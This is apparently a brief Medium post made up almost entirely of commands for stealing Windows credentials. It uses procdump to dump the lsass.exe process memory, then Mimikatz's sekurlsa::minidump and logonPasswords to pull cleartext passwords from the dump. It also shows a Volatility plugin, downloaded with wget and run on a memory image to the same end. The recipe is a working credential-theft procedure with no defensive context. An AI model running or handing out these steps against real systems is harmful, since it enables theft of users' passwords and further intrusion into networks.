using Mimikatz to get cleartext password from offline memory dump

C:\temp\procdump.exe -accepteula  -ma lsass.exe lsass.dmp
#For 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp
#For 64 bits
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords full
  1. /usr/share/volatility
  2. mkdir plugins
  3. cd plugins
  4. wget https://raw.githubusercontent.com/dfirfpi/hotoloti/master/volatility/mimikatz.py
  5. apt-get install python-crypto
  6. volatility — plugins=/usr/share/volatility/plugins — profile=Win7SP0x86 -f halomar.dmp mimikatz

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store